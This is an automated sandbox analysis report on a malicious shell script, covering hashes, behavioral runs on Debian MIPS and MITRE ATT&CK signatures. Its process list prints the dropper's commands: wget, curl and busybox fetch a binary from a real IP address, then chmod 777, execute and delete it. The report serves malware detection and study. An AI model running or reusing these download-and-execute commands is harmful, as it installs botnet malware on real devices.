Analysis
-
max time kernel
61s -
max time network
63s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240418-en -
resource tags
arch:mips image:debian9-mipsbe-20240418-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mips system -
submitted
18/10/2024, 01:44
Static task
static1
Behavioral task
behavioral1
Sample
5526f5a7976ca245ef2154c91f769b8cc02aeac8665e74992d2faee34374dad9.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
5526f5a7976ca245ef2154c91f769b8cc02aeac8665e74992d2faee34374dad9.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
5526f5a7976ca245ef2154c91f769b8cc02aeac8665e74992d2faee34374dad9.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
5526f5a7976ca245ef2154c91f769b8cc02aeac8665e74992d2faee34374dad9.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
5526f5a7976ca245ef2154c91f769b8cc02aeac8665e74992d2faee34374dad9.sh
-
Size
10KB
-
MD5
bfe3d249b6508a12db9768a04b73f517
-
SHA1
db227d5165875c1ff5204cbff31fd0cd47cad3cd
-
SHA256
5526f5a7976ca245ef2154c91f769b8cc02aeac8665e74992d2faee34374dad9
-
SHA512
f09d55be45117aa3959abf5049eff0283edea080c158c33f2efc02d03ac47e2bcf17eaa333a514e8617670308d41f4faf4d4795f49e32d98d4bcdaab874d08a2
-
SSDEEP
96:bNlrDkvnIeGl6WbjfLzSvTcI4xwMLLeO6qFlrDki2IeGl6WrkLkV9ZFLzSvTwP5v:bNlrDkvnyFLeOx7rDkAP9
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
File opened for reading: /proc/sys/crypto/fips_enabled (process: curl)
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/5526f5a7976ca245ef2154c91f769b8cc02aeac8665e74992d2faee34374dad9.sh: /tmp/5526f5a7976ca245ef2154c91f769b8cc02aeac8665e74992d2faee34374dad9.sh (PID:728)
-
/bin/rm: /bin/rm bins.sh (PID:732)
-
/usr/bin/wget: wget http://87.120.126.196/bins/P6R3WSmwSuUWCuL6JlbnIzajBHDAk41oUP (PID:734)
-
/usr/bin/curl: curl -O http://87.120.126.196/bins/P6R3WSmwSuUWCuL6JlbnIzajBHDAk41oUP (PID:745)
- Reads runtime system information
- Writes file to tmp directory
-
/bin/busybox: /bin/busybox wget http://87.120.126.196/bins/P6R3WSmwSuUWCuL6JlbnIzajBHDAk41oUP (PID:755)
-
/bin/chmod: chmod 777 P6R3WSmwSuUWCuL6JlbnIzajBHDAk41oUP (PID:758)
- File and Directory Permissions Modification
-
/tmp/P6R3WSmwSuUWCuL6JlbnIzajBHDAk41oUP: ./P6R3WSmwSuUWCuL6JlbnIzajBHDAk41oUP (PID:759)
- Executes dropped EXE
-
/bin/rm: rm P6R3WSmwSuUWCuL6JlbnIzajBHDAk41oUP (PID:760)
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97